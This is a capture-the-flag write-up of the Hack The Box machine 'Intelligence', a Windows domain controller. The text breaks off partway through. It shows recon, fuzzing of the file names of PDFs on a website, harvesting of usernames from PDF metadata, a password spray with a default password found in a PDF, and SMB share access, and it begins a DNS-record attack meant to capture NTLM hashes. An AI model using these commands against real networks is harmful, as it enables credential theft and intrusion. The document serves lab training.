# Intelligence - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Intelligence was a pleasant, medium-rated HTB Windows machine created by [Micah](https://app.hackthebox.com/users/22435)

In this box, we parse PDF data to find a password and harvest usernames from metadata for foothold.  
Lateral movement involves adding DNS records to force NTLM authentication and capturing the encrypted challenge.  
Privilege escalation includes constrained delegation (with protocol transition) after reading the gMSA password.

## Initial recon

```console
opcode@debian$ nmap -v -p- --min-rate 2000 10.10.10.248
Nmap scan report for 10.10.10.248
Host is up (0.14s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49691/tcp open  unknown
49692/tcp open  unknown
49705/tcp open  unknown
49714/tcp open  unknown
53296/tcp open  unknown
```

```console
opcode@debian$ nmap -sC -sV -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49691,49692,49705,49714,53296 -oN intelligence.nmap 10.10.10.248
Nmap scan report for 10.10.10.248
Host is up (0.096s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Intelligence
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-11-23 18:44:40Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-11-23T18:46:10+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-11-23T18:46:10+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-11-23T18:46:10+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2023-11-23T18:46:10+00:00; +7h00m02s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49691/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49692/tcp open  msrpc         Microsoft Windows RPC
49705/tcp open  msrpc         Microsoft Windows RPC
49714/tcp open  msrpc         Microsoft Windows RPC
53296/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-11-23T18:45:33
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m00s
```

Several ports are open, including DNS, Kerberos, SMB, RPC, LDAP, and WinRM. It's likely a DC.

We can start with LDAP enumeration:

```console
opcode@debian$ ldapsearch -x -H ldap://10.10.10.248 -s base -b "" -LLL
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=intelligence,DC=htb
ldapServiceName: intelligence.htb:dc$@INTELLIGENCE.HTB
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
[--SNIP--]
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=intelligence,DC=htb
serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=intelligence,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=intelligence,DC=htb
namingContexts: DC=intelligence,DC=htb
namingContexts: CN=Configuration,DC=intelligence,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=intelligence,DC=htb
namingContexts: DC=DomainDnsZones,DC=intelligence,DC=htb
namingContexts: DC=ForestDnsZones,DC=intelligence,DC=htb
isSynchronized: TRUE
highestCommittedUSN: 102480
dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=intelligence,DC=htb
dnsHostName: dc.intelligence.htb
defaultNamingContext: DC=intelligence,DC=htb
currentTime: 20231123184706.0Z
configurationNamingContext: CN=Configuration,DC=intelligence,DC=htb
```

We have the FQDN `dc.intelligence.htb` here; we can add it to `/etc/hosts`:

```text
10.10.10.248 dc.intelligence.htb intelligence.htb dc
```

## SMB enumeration

We can enumerate SMB shares. [NetExec](https://github.com/Pennyw0rth/NetExec) is my tool of choice these days:

```console
opcode@debian$ docker run -it --entrypoint=/bin/bash --rm --name netexec nxc:latest
root@8090a585010c:~# echo '10.10.10.248 dc.intelligence.htb intelligence.htb dc' >> /etc/hosts
```

Testing for null session:

```console
root@8090a585010c:~# nxc smb 10.10.10.248 -d intelligence.htb -u '' -p '' --shares
SMB         10.10.10.248    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.248    445    DC               [+] intelligence.htb\: 
SMB         10.10.10.248    445    DC               [-] Error enumerating shares: STATUS_ACCESS_DENIED
```

Null sessions are disabled.

Testing for guest session:

```console
root@8090a585010c:~# nxc smb 10.10.10.248 -d intelligence.htb -u 'opcode' -p '' --shares
SMB         10.10.10.248    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.248    445    DC               [-] intelligence.htb\opcode: STATUS_LOGON_FAILURE
```

Guest sessions are disabled as well.  
I also ran [enum4linux-ng](https://github.com/cddmp/enum4linux-ng) for RPC enumeration, but it didn't find anything.

## Exploring the website

On the website, I found a couple of PDFs at <http://intelligence.htb/documents/2020-01-01-upload.pdf> and <http://intelligence.htb/documents/2020-12-15-upload.pdf>, both containing lorem ipsum.  
Running `exiftool` on them, we can get potential usernames from `Creator` field:

```console
opcode@debian$ exiftool *.pdf -Creator
======== 2020-01-01-upload.pdf
Creator                         : William.Lee
======== 2020-12-15-upload.pdf
Creator                         : Jose.Williams
    2 image files read
```

The names of the PDFs are predictable. We can write a Python script to create a wordlist: [gen_date_wordlist.py](gen_date_wordlist.py)

```py
from datetime import datetime, timedelta


def generate_filenames(start_date, end_date):
    current_date = start_date
    while current_date <= end_date:
        yield f"{current_date.strftime('%Y-%m-%d')}-upload.pdf"
        current_date += timedelta(days=1)


start_date = datetime(2019, 1, 1)
end_date = datetime(2021, 12, 31)

with open('wordlist.txt', 'w') as f:
    for filename in generate_filenames(start_date, end_date):
        f.write(filename + '\n')
```

```console
opcode@debian$ python3 gen_date_wordlist.py
```

Now [ffuf](https://github.com/ffuf/ffuf) can be used to enumerate files present on the website:

```console
opcode@debian$ ffuf -c -w ./wordlist.txt -u http://intelligence.htb/documents/FUZZ -mc all -fs 1245 -o out.json
```

The output of `ffuf` is JSON by default and contains several fields. [jq](https://jqlang.github.io/jq/) can be used to parse out the relevant field:

```console
opcode@debian$ cat out.json | jq -r '.results[].url' > valid.txt
```

Now, `curl` and bash tricks can be used to get a list of usernames:

```console
opcode@debian$ while read -r LINE; do curl -s "$LINE" | exiftool -Creator - | awk '{print $3}'; done < valid.txt | sort -u > users.txt
```

Validate the usernames with `kerbrute`:

```console
opcode@debian$ kerbrute userenum ~/users.txt --dc 10.10.10.248 -d intelligence.htb

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 11/23/23 - Ronnie Flathers @ropnop

2023/11/23 19:25:51 >  Using KDC(s):
2023/11/23 19:25:51 >   10.10.10.248:88

2023/11/23 19:25:51 >  [+] VALID USERNAME:   Daniel.Shelton@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   Darryl.Harris@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   Brian.Baker@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   David.Mcbride@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   Anita.Roberts@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   David.Reed@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   David.Wilson@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   Brian.Morris@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   Ian.Duncan@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   Danny.Matthews@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   Jason.Patterson@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   Jason.Wright@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   Jose.Williams@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   Kaitlyn.Zimmerman@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   Jessica.Moody@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   Jennifer.Thomas@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   John.Coleman@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   Kelly.Long@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   Nicole.Brock@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   Richard.Williams@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   Samuel.Richardson@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   Scott.Scott@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   Stephanie.Young@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   Teresa.Williamson@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   Thomas.Valenzuela@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   Tiffany.Molina@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   Veronica.Patel@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   William.Lee@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   Travis.Evans@intelligence.htb
2023/11/23 19:25:51 >  [+] VALID USERNAME:   Thomas.Hall@intelligence.htb
2023/11/23 19:25:51 >  Done! Tested 30 usernames (30 valid) in 0.342 seconds
```

With the list of users, we can try roasting AS-REPs:

```console
opcode@debian$ GetNPUsers.py intelligence.htb/ -usersfile users.txt
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[-] User Anita.Roberts doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Brian.Baker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Brian.Morris doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Daniel.Shelton doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Danny.Matthews doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Darryl.Harris doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User David.Mcbride doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User David.Reed doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User David.Wilson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Ian.Duncan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jason.Patterson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jason.Wright doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jennifer.Thomas doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jessica.Moody doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User John.Coleman doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jose.Williams doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Kaitlyn.Zimmerman doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Kelly.Long doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Nicole.Brock doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Richard.Williams doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Samuel.Richardson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Scott.Scott doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Stephanie.Young doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Teresa.Williamson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Thomas.Hall doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Thomas.Valenzuela doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Tiffany.Molina doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Travis.Evans doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Veronica.Patel doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User William.Lee doesn't have UF_DONT_REQUIRE_PREAUTH set
```

Nothing here.  
Transfer the users list to the container:

```console
opcode@debian$ docker cp ~/users.txt netexec:/root/
```

We can test for instances of empty passwords or passwords that are the same as usernames:

```console
root@8090a585010c:~# nxc smb 10.10.10.248 -d intelligence.htb -u users.txt -p '' --continue-on-success
root@8090a585010c:~# nxc smb 10.10.10.248 -d intelligence.htb -u users.txt -p users.txt --no-bruteforce --continue-on-success
```

Both of them did not find anything. I also tried using `-k`, but no dice.

## Finding password in a PDF document

I consulted a write-up and learnt that one of the PDFs contained a password.  
Therefore, I created a Python script to parse the PDFs and look for sensitive information:

```py
from io import BytesIO
from pypdf import PdfReader
import requests


def parse_pdf_content(url):
    r = requests.get(url)
    pdf_handle = BytesIO(r.content)
    reader = PdfReader(pdf_handle)

    contents = ''
    for i in reader.pages:
        contents += i.extract_text()

    return contents


def detect_sensitive_information(data):
    if 'intelligence' in data.lower():
        return True

    return False


if __name__ == "__main__":
    proxy = {}
    # proxy['http'] = 'http://127.0.0.1:8080'

    with open('valid.txt', 'r') as f:
        valid_urls = f.read().split()

    for url in valid_urls:
        contents = parse_pdf_content(url)
        if detect_sensitive_information(contents):
            print(contents)
```

```console
opcode@debian$ python3 parse_pdf.py
New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.
```

We can spray it across the list of users:

```console
root@8090a585010c:~# nxc smb 10.10.10.248 -d intelligence.htb -u users.txt -p 'NewIntelligenceCorpUser9876' --continue-on-success
SMB         10.10.10.248    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Anita.Roberts:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Brian.Baker:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Brian.Morris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Daniel.Shelton:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Danny.Matthews:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Darryl.Harris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [-] intelligence.htb\David.Wilson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Jason.Patterson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Jennifer.Thomas:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Jessica.Moody:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Kaitlyn.Zimmerman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Kelly.Long:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Scott.Scott:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Teresa.Williamson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Thomas.Hall:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [-] intelligence.htb\Veronica.Patel:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.10.10.248    445    DC               [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
```

It worked for `Tiffany.Molina`

## Post-credential enumeration

Now that we have a set of credentials, we can enumerate more.
Starting with SMB shares:

```console
root@8090a585010c:~# nxc smb 10.10.10.248 -d intelligence.htb -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' --shares
SMB         10.10.10.248    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.248    445    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
SMB         10.10.10.248    445    DC               [*] Enumerated shares
SMB         10.10.10.248    445    DC               Share           Permissions     Remark
SMB         10.10.10.248    445    DC               -----           -----------     ------
SMB         10.10.10.248    445    DC               ADMIN$                          Remote Admin
SMB         10.10.10.248    445    DC               C$                              Default share
SMB         10.10.10.248    445    DC               IPC$            READ            Remote IPC
SMB         10.10.10.248    445    DC               IT              READ        
SMB         10.10.10.248    445    DC               NETLOGON        READ            Logon server share
SMB         10.10.10.248    445    DC               SYSVOL          READ            Logon server share
SMB         10.10.10.248    445    DC               Users           READ        
```

`IT` and `Users` are not default shares; we need to explore them.  
But I would like to check a few other things first:

```console
root@8090a585010c:~# nxc ldap 10.10.10.248 -d intelligence.htb -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -M adcs
SMB         10.10.10.248    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
LDAP        10.10.10.248    389    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876 
ADCS        10.10.10.248    389    DC               [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS                                                Found PKI Enrollment Server: dc.intelligence.htb
ADCS                                                Found CN: intelligence-DC-CA

root@8090a585010c:~# nxc ldap 10.10.10.248 -d intelligence.htb -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -M maq
SMB         10.10.10.248    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
LDAP        10.10.10.248    389    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876 
MAQ         10.10.10.248    389    DC               [*] Getting the MachineAccountQuota
MAQ         10.10.10.248    389    DC               MachineAccountQuota: 10

root@8090a585010c:~# nxc smb 10.10.10.248 -d intelligence.htb -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -M enum_av
SMB         10.10.10.248    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.248    445    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876 
ENUM_AV     10.10.10.248    445    DC               Found NOTHING!
```

And some groups:

```console
root@8090a585010c:~# nxc ldap 10.10.10.248 -d intelligence.htb -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -M group-mem -o group='Remote Management Users'
SMB         10.10.10.248    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
LDAP        10.10.10.248    389    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876 

root@8090a585010c:~# nxc ldap 10.10.10.248 -d intelligence.htb -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -M group-mem -o group='Domain Admins'
SMB         10.10.10.248    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
LDAP        10.10.10.248    389    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876 
GROUP-ME... 10.10.10.248    389    DC               [+] Found the following members of the Domain Admins group:
GROUP-ME... 10.10.10.248    389    DC               Administrator

root@8090a585010c:~# nxc ldap 10.10.10.248 -d intelligence.htb -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -M group-mem -o group='Protected Users'
SMB         10.10.10.248    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
LDAP        10.10.10.248    389    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876

root@8090a585010c:~# nxc ldap 10.10.10.248 -d intelligence.htb -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -M group-mem -o group='Domain Computers'
SMB         10.10.10.248    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
LDAP        10.10.10.248    389    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876 
GROUP-ME... 10.10.10.248    389    DC               [+] Found the following members of the Domain Computers group:
GROUP-ME... 10.10.10.248    389    DC               svc_int$
```

Oddly, no user is present in `Remote Management Users` group. This box even has PKI.  
A domain computer is present as well.

We can use `smbclient` to explore the SMB share:

```console
opcode@debian$ smbclient //intelligence.htb/Users -U 'Tiffany.Molina%NewIntelligenceCorpUser9876'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Mon Apr 19 06:50:26 2021
  ..                                 DR        0  Mon Apr 19 06:50:26 2021
  Administrator                       D        0  Mon Apr 19 05:48:39 2021
  All Users                       DHSrn        0  Sat Sep 15 12:51:46 2018
  Default                           DHR        0  Mon Apr 19 07:47:40 2021
  Default User                    DHSrn        0  Sat Sep 15 12:51:46 2018
  desktop.ini                       AHS      174  Sat Sep 15 12:41:27 2018
  Public                             DR        0  Mon Apr 19 05:48:39 2021
  Ted.Graves                          D        0  Mon Apr 19 06:50:26 2021
  Tiffany.Molina                      D        0  Mon Apr 19 06:21:46 2021

        3770367 blocks of size 4096. 1456163 blocks available
```

It is exposed so that we can read the user flag.

```console
opcode@debian$ smbclient //intelligence.htb/IT -U 'Tiffany.Molina%NewIntelligenceCorpUser9876'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Apr 19 06:20:55 2021
  ..                                  D        0  Mon Apr 19 06:20:55 2021
  downdetector.ps1                    A     1046  Mon Apr 19 06:20:55 2021

        3770367 blocks of size 4096. 1456163 blocks available
smb: \> get downdetector.ps1 
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (3.0 KiloBytes/sec) (average 3.0 KiloBytes/sec)
```

## Adding DNS records to force NTLM authentication

```console
opcode@debian$ dos2unix downdetector.ps1           
dos2unix: converting UTF-16LE file downdetector.ps1 to UTF-8 Unix format...
```

The contents of `downdetector.ps1`:

```powershell
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory 
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}
```

It is a health-check script. It acquires those DNS records from LDAP that include "web" in their name and checks their status by making a web request. If any of them are down, it sends an email.

The `-UseDefaultCredentials` ensures that the `DefaultCredentials` are sent with requests. Therefore, if we can add a server we control to the DNS records, we can force an NTLM authentication and grab an encrypted challenge.  
Here's the weird part: all authenticated users can create new DNS records by default.

```console
opcode@debian$ ldapsearch -x -H ldap://10.10.10.248 -D 'intelligence\Tiffany.Molina' -w 'NewIntelligenceCorpUser9876' -b 'DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb' Name -LLL
dn: DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb
name: intelligence.htb

dn: DC=_ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb
name: _ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones

dn: DC=ForestDnsZones,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb
name: ForestDnsZones

dn: DC=_ldap._tcp.ForestDnsZones,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb
name: _ldap._tcp.ForestDnsZones

dn: DC=_ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb
name: _ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones

dn: DC=@,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb
name: @

dn: DC=_gc._tcp,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb
name: _gc._tcp

dn: DC=_gc._tcp.Default-First-Site-Name._sites,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb
